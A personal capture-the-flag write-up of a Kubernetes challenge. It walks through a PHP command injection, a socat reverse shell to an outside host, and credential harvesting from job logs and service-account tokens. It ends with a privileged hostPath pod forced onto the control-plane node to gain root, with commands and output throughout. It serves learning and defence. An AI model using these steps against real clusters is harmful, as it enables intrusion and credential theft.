
Introduction

Redguard had a Kubernetes hacking challenge at Area 41. Since this is my current area of interest, I had to solve it. Unfortunately I did not do it on Friday but postponed it to Saturday, and therefore missed the challenge prizes, but at least I wanted to use this challenge to get into the habit of writing writeups. Now that Redguard has published the solution, I needed to write this before reading the official blog post. So here we go.

After registration, I got a mail with the information needed to connect to the cluster.

Your Kubernetes Challenge instance is now available at the following IP address: xxx.xxx.xxx.xxx Point your /etc/hosts for hello-world.tld to xxx.xxx.xxx.xxx. After you’ve done this “https://hello-world.tld/” will be your starting point.

Try to get full access to the master node and if you’ve found the flag at the end of the challenge (look for /root/flag.txt), please submit it at https://k8s-challenge.redguard.ch/flag?email=’my-email’

Visiting the page showed a simple page with the text Welcome to disenchant-vulnerable-app-demo-on-public-docker-hub-567654mwq69. Unfortunately I did not take a screenshot, so that would be the first lesson learned. This also seems to be the right point for a disclaimer: I started solving this on Friday side by side with my two coworkers Philip and Philipp. While I ran Gobuster to find directories, Philipp managed to find a PHP "shell" on the page. Seeing that Gobuster did not bring up anything useful, I continued with this shell.

By the way, the title also hints directly at the Docker image used, disenchant/vulnerable-app-demo, which may be the intended path to find this command injection, but I think Philipp found it using Google and GitHub or a blog post. I plan to write another post on how to extract this information from the Docker image later.

So this "shell" was a command injection: the value of a GET parameter named shell was executed directly via PHP's system function.

<?php
// attacker-controlled input goes straight into system()
if ($_GET['shell']) {
  echo "<pre>";
  system($_GET['shell']);
  echo "</pre>";
}
?>
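For illustration, triggering it is a single HTTP request with the command in the shell parameter (assuming the script sits at the web root, which matched what we saw):

$ curl -sk 'https://hello-world.tld/?shell=id'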

First Pod - restricted-viewer

It was no surprise that the current user is www-data with the home directory /var/www. Initially I only played around with the command injection itself and did not create a reverse shell. At home on Saturday I used my own VM and socat to get a proper reverse shell like this:

# on my VM
$ socat TCP-LISTEN:9001,reuseaddr FILE:`tty`,raw,echo=0
# on the Pod
$ ./socat TCP4:xxx.xxx.xxx.xxx:9001 EXEC:bash,pty,stderr,setsid,sigint,sane

This was possible since there was no restriction on downloading anything from the internet, so I used curl to fetch socat and kubectl:

$ curl -LO https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
$ curl -LO https://dl.k8s.io/release/v1.30.0/bin/linux/amd64/kubectl
$ chmod +x ./socat ./kubectl

This open connection to the Internet could have been prevented using Kubernetes Network Policies, but that is another story.
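As a sketch, a default-deny egress policy for the applications namespace would look like this (the policy name is illustrative, and a CNI plugin that enforces NetworkPolicies is assumed):

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-egress
  namespace: applications
spec:
  podSelector: {}   # select all pods in the namespace
  policyTypes:
  - Egress          # no egress rules listed, so all egress is denied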

With kubectl and the mounted service account token in /var/run/secrets/kubernetes.io/serviceaccount/ we were able to ask what we are allowed to do.
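When run inside a pod without a kubeconfig, kubectl falls back to exactly this mounted service account, which is why plain ./kubectl works below. The same credentials can also be passed explicitly, e.g.:

$ TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ ./kubectl --server=https://kubernetes.default.svc \
    --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
    --token="$TOKEN" auth whoami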

$ ./kubectl auth whoami
ATTRIBUTE                                           VALUE
Username                                            system:serviceaccount:applications:restricted-viewer
UID                                                 87b788cf-cfb7-4fa0-89d7-1659cbd2c1d6
Groups                                              [system:serviceaccounts system:serviceaccounts:applications system:authenticated]
Extra: authentication.kubernetes.io/credential-id   [JTI=60171891-8d19-447b-842c-d26d29863eb9]
Extra: authentication.kubernetes.io/node-name       [hack-me-m02]
Extra: authentication.kubernetes.io/node-uid        [f9407f57-c773-4ffa-bb30-bb91f39839b6]
Extra: authentication.kubernetes.io/pod-name        [disenchant-vulnerable-app-demo-on-public-docker-hub-567654mwq69]
Extra: authentication.kubernetes.io/pod-uid         [a907130c-e0f5-4fb2-a173-bb7e48026005]

This tells us that we are using the service account restricted-viewer in the namespace applications and are currently running on the node hack-me-m02.

$ ./kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
namespaces                                      []                                     []               [list]
nodes                                           []                                     []               [list]

The first part shows some default entries; the interesting part is that we are allowed to list namespaces and nodes.

$ ./kubectl get nodes
NAME          STATUS                     ROLES                  AGE    VERSION
hack-me       Ready,SchedulingDisabled   control-plane,master   2d1h   v1.30.0
hack-me-m02   Ready                      worker                 2d1h   v1.30.0

$ ./kubectl get namespaces
NAME              STATUS   AGE
applications      Active   2d1h
default           Active   2d1h
ingress-nginx     Active   2d1h
jobs              Active   2d1h
kube-node-lease   Active   2d1h
kube-public       Active   2d1h
kube-system       Active   2d1h
test              Active   2d1h

Knowing that the allowed actions can vary depending on the namespace, I checked all the namespaces.
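A small loop does this in one go (a sketch; it relies on the namespace list permission we just confirmed):

$ for ns in $(./kubectl get namespaces -o name | cut -d/ -f2); do \
    echo "--- $ns"; ./kubectl auth can-i --list -n "$ns"; done

The interesting results were the following: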

$ ./kubectl auth can-i --list -n applications
Resources                                       Non-Resource URLs                      Resource Names   Verbs
...
namespaces                                      []                                     []               [list]
nodes                                           []                                     []               [list]
$ ./kubectl auth can-i --list -n default
Resources                                       Non-Resource URLs                      Resource Names   Verbs
...
namespaces                                      []                                     []               [list]
nodes                                           []                                     []               [list]
pods                                            []                                     []               [list]
$ ./kubectl auth can-i --list -n jobs
Resources                                       Non-Resource URLs                      Resource Names   Verbs
...
pods/log                                        []                                     []               [list get]
pods                                            []                                     []               [list get]
jobs.batch/log                                  []                                     []               [list get]
jobs.batch                                      []                                     []               [list get]
namespaces                                      []                                     []               [list]
nodes                                           []                                     []               [list]

Second Pod - my log has something to tell you

The namespaces default and jobs allow us to list pods.

$ ./kubectl get pods -n default -o wide
NAME                                   READY   STATUS    RESTARTS   AGE    IP              NODE          NOMINATED NODE   READINESS GATES
the-princess-is-in-another-namespace   1/1     Running   0          2d1h   10.244.88.129   hack-me-m02   <none>           <none>
$ ./kubectl get pods -n jobs -o wide
NAME                   READY   STATUS      RESTARTS   AGE     IP              NODE          NOMINATED NODE   READINESS GATES
hello-28631096-25vr6   0/1     Completed   0          2m52s   10.244.88.157   hack-me-m02   <none>           <none>
hello-28631097-65zcq   0/1     Completed   0          112s    10.244.88.158   hack-me-m02   <none>           <none>
hello-28631098-vppcs   0/1     Completed   0          52s     10.244.88.159   hack-me-m02   <none>           <none>

In jobs we are also allowed to get the logs of the batch jobs. If you check the existing pods, you realize that they run every minute and get deleted after three minutes (or rather, only the three newest instances are kept). So let's check one of the newest pods for logs.

$ ./kubectl -n jobs logs hello-28631098-vppcs
Sat Jun  8 16:58:01 UTC 2024
My environment variables:
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.96.0.1:443
HOSTNAME=hello-28631098-vppcs
SHLVL=1
HOME=/root
SSH_PASSWORD_ACCESS=true
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_PROTO=tcp
SSH_PASSWORD=s3cr3t-area41
SSH_HOST=openssh-server-service.applications.svc.cluster.local
SSH_USER=test-user
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_SERVICE_HOST=10.96.0.1
PWD=/
SSH_PORT=2222
StrictHostKeyChecking=no

It looks like the job is listing all its environment variables. Besides some default Kubernetes variables, we find a few more that come from a mounted secret and belong to SSH:

SSH_PASSWORD=s3cr3t-area41
SSH_HOST=openssh-server-service.applications.svc.cluster.local
SSH_USER=test-user
SSH_PORT=2222
StrictHostKeyChecking=no

By the way, since we have get on pods in the namespace jobs, we could have obtained all this information about the executed command, mounted secrets and so on by reading the pod YAML:

$ ./kubectl -n jobs get pod hello-28631098-vppcs -o yaml

…but again, I did not copy the output for this ;)
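For reference, the relevant part of such a pod spec would look roughly like this (reconstructed, not the actual output; image, command and secret name are guesses based on the log):

apiVersion: v1
kind: Pod
metadata:
  name: hello-28631098-vppcs
  namespace: jobs
spec:
  containers:
  - name: hello
    image: busybox   # guessed
    command: ["/bin/sh", "-c", "date; echo 'My environment variables:'; env"]
    envFrom:
    - secretRef:
        name: ssh-credentials   # hypothetical secret name
  restartPolicy: OnFailure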

OK, so now we know there is a service running in our current namespace which should be reachable via SSH.

Disclaimer: This step took me quite a while, figuring out how to SSH into this service. I am not 100% sure what caused the problem; maybe my socat shell was part of it, or not being allowed to write to /var/www/.ssh. I was not able to get a stable interactive SSH session.
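In hindsight, running single commands non-interactively probably sidesteps the TTY trouble entirely (untested during the challenge):

$ sshpass -p 's3cr3t-area41' ssh -o StrictHostKeyChecking=no -p 2222 \
    test-user@openssh-server-service.applications.svc.cluster.local 'id'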

So after a lot of trial and error and trying different approaches, the following worked to copy the files to the current pod. There was an SSH error, but it worked, and I got new Kubernetes credentials to check.

$ sshpass -p 's3cr3t-area41' scp -o StrictHostKeyChecking=no -P2222 test-user@openssh-server-service.applications.svc.cluster.local:/var/run/secrets/kubernetes.io/serviceaccount/token ./token
$ sshpass -p 's3cr3t-area41' scp -o StrictHostKeyChecking=no -P2222 test-user@openssh-server-service.applications.svc.cluster.local:/var/run/secrets/kubernetes.io/serviceaccount/ca.crt ./ca.crt
...
Could not create directory '/var/www/.ssh'.
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
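The error is harmless: scp just cannot record the host key because the home directory is not writable. Pointing the known-hosts file somewhere else would have silenced it, e.g.:

$ sshpass -p 's3cr3t-area41' scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -P2222 test-user@openssh-server-service.applications.svc.cluster.local:/var/run/secrets/kubernetes.io/serviceaccount/token ./token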

Third Pod - pod-executor

Now that we have new credentials, we want to see what we are allowed to do. First, still on the initial pod, I added a new context to the local kubeconfig:

$ ./kubectl config set-cluster next --server=https://kubernetes.default --certificate-authority=./ca.crt
$ ./kubectl config set-context next --cluster=next
$ ./kubectl config set-credentials user --token={token}
$ ./kubectl config set-context next --user=user
$ ./kubectl config use-context next
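One caveat: kubectl writes this to ~/.kube/config by default, and we already saw that the home directory /var/www is not writable, so pointing KUBECONFIG at a writable path may be necessary (I do not recall whether I had to):

$ export KUBECONFIG=/tmp/kubeconfig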

As you may have guessed, it is time to check what we are allowed to do, as we did before. This time our service account is pod-executer, and the only interesting namespace seems to be default.

$ ./kubectl auth whoami
ATTRIBUTE                                           VALUE
Username                                            system:serviceaccount:applications:pod-executer
UID                                                 18dec8f8-44c9-486d-93b3-3c4db042b004
Groups                                              [system:serviceaccounts system:serviceaccounts:applications system:authenticated]
Extra: authentication.kubernetes.io/credential-id   [JTI=8fc42565-13d4-4e6b-b4bf-d226440f088a]
Extra: authentication.kubernetes.io/node-name       [hack-me-m02]
Extra: authentication.kubernetes.io/node-uid        [f9407f57-c773-4ffa-bb30-bb91f39839b6]
Extra: authentication.kubernetes.io/pod-name        [openssh-server-6d4b85f979-zxwkd]
Extra: authentication.kubernetes.io/pod-uid         [91bf1f54-f817-4d26-a7d5-600196eb490b]
$ ./kubectl auth can-i --list -n default
Resources                                       Non-Resource URLs                      Resource Names   Verbs
pods/exec                                       []                                     []               [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
pods/log                                        []                                     []               [get list]
pods                                            []                                     []               [get list]

We are allowed to get/list pods and their logs, and also to execute commands in existing pods in the namespace default.

$ ./kubectl -n default logs the-princess-is-in-another-namespace
/docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration
/docker-entrypoint.sh: Looking for shell scripts in /docker-entrypoint.d/
/docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.sh
10-listen-on-ipv6-by-default.sh: info: Getting the checksum of /etc/nginx/conf.d/default.conf
10-listen-on-ipv6-by-default.sh: info: Enabled listen on IPv6 in /etc/nginx/conf.d/default.conf
/docker-entrypoint.sh: Sourcing /docker-entrypoint.d/15-local-resolvers.envsh
/docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.sh
/docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.sh
/docker-entrypoint.sh: Configuration complete; ready for start up
2024/06/06 15:30:51 [notice] 1#1: using the "epoll" event method
2024/06/06 15:30:51 [notice] 1#1: nginx/1.27.0
2024/06/06 15:30:51 [notice] 1#1: built by gcc 12.2.0 (Debian 12.2.0-14) 
2024/06/06 15:30:51 [notice] 1#1: OS: Linux 6.8.0-35-generic
2024/06/06 15:30:51 [notice] 1#1: getrlimit(RLIMIT_NOFILE): 1048576:1048576
2024/06/06 15:30:51 [notice] 1#1: start worker processes
2024/06/06 15:30:51 [notice] 1#1: start worker process 29
2024/06/06 15:30:51 [notice] 1#1: start worker process 30

The logs contain some more things that may be of interest, but first, let's get a shell in the pod.

$ ./kubectl -n default exec --stdin --tty the-princess-is-in-another-namespace -- /bin/bash
# id
uid=0(root) gid=0(root) groups=0(root)

I did not invest much time checking the files listed in the log, but went straight to the known drill: check what we are allowed to do with the service account of the current pod.

$ ./kubectl auth whoami
ATTRIBUTE                                           VALUE
Username                                            system:serviceaccount:default:pod-creator
UID                                                 05aba103-34d2-401c-993c-58a11b709555
Groups                                              [system:serviceaccounts system:serviceaccounts:default system:authenticated]
Extra: authentication.kubernetes.io/credential-id   [JTI=c98828d5-91f2-411b-abc9-798c0c0469e3]
Extra: authentication.kubernetes.io/node-name       [hack-me-m02]
Extra: authentication.kubernetes.io/node-uid        [f9407f57-c773-4ffa-bb30-bb91f39839b6]
Extra: authentication.kubernetes.io/pod-name        [the-princess-is-in-another-namespace]
Extra: authentication.kubernetes.io/pod-uid         [8dd9a749-6f0e-4243-b8c6-016b54fcc38e]

# ./kubectl auth can-i --list -n default
# ./kubectl auth can-i --list -n applications
# ./kubectl auth can-i --list -n test
# ./kubectl auth can-i --list -n jobs
Resources                                       Non-Resource URLs                      Resource Names   Verbs
pods                                            []                                     []               [create get list]
pods/exec                                       []                                     []               [create]
pods/log                                        []                                     []               [get list]

Bingo! We have the promising service account pod-creator and are allowed to create pods in the namespaces applications, default, jobs and test. So the direct way to the cluster node will be a malicious pod mounting the root filesystem of the node. Easy peasy lemon squeezy.

# cat attacker-pod.yml
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker-pod-control
  name: attacker-pod-control
spec:
  volumes:
  - name: host-fs
    hostPath:
      path: /            # the node's root filesystem
  containers:
  - image: ubuntu
    imagePullPolicy: Always
    name: attacker-pod
    command: ["/bin/sh", "-c", "sleep infinity"]
    volumeMounts:
      - name: host-fs
        mountPath: /root   # node filesystem appears at /root inside the container
  restartPolicy: Never
# kubectl apply -f attacker-pod.yml -n default
Error from server (Forbidden): error when creating "attacker-pod.yml": pods "attacker-pod-control" is forbidden: violates PodSecurity "baseline:latest": hostPath volumes (volume "host-fs")

OK, the Pod Security Admission on the namespace does not allow creating pods with a hostPath mount. But PSA is configured per namespace, so we just have to try the other namespaces. Bingo!

# kubectl apply -f attacker-pod.yml -n test
pod/attacker-pod-control created
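In hindsight, PSA enforcement is set via labels on each namespace, so the first service account (which could list namespaces) could have revealed upfront which namespace is unrestricted, assuming the standard pod-security labels are used:

$ ./kubectl get namespaces --show-labels | grep pod-security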

Disclaimer: At this point I again lost some time on the worker node hack-me-m02, trying to somehow pivot to the control-plane node hack-me, which did not work for me. The takeaway here is the wonderful HackTricks Cloud edition at https://cloud.hacktricks.xyz, which collects lots of cloud-related information just like the classic https://book.hacktricks.xyz/ does.

Final destination - the control-plane

After some time on the worker node, I took a step back and got curious about the node status SchedulingDisabled. Maybe there is a way to enforce scheduling a pod on the hack-me control-plane node. Long story short: yes, there is. Cordoning a node only tells the kube-scheduler to skip it; setting spec.nodeName in the pod manifest assigns the pod to a node directly and bypasses the scheduler entirely. With this small edit in our attacker-pod.yml we get our pod scheduled on the control-plane node.

spec:
  nodeName: hack-me
# kubectl apply -f attacker-pod.yml -n test
pod/attacker-pod-control created

# kubectl -n test exec --stdin --tty attacker-pod-control -- /bin/bash
root@attacker-pod-control:/# chroot /root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /etc/hostname
hack-me
# cat /root/flag.txt

Lessons learned / ToDo

Doing better writeups

As already mentioned above, I have to take screenshots of the things I want to illustrate. Also, after writing this, I am unsure about the length. Is it too long, too much blah blah, or OK, or does it even need more explanation? I guess this also depends on what you are looking for: just a short "show me how to solve it" or more background information.

Potential Posts

Since I work quite a lot with Docker images, I may also have some tricks on how to handle them. A first post may be on how to extract information from the disenchant/vulnerable-app-demo image.

Hacking Kubernetes

This challenge was IMHO not very hard and pretty straightforward, and from my work experience I can think of many security features that would have made it harder, like Kubernetes network policies, preventing root pods and limiting the service accounts. Still, I learned some things, especially with the help of HackTricks Cloud.

What I did here was all manual and, as you saw, repetitive. My developer heart tells me this needs to be automated, and I think much of it already is. HackTricks lists some tools that I definitely have to try some day.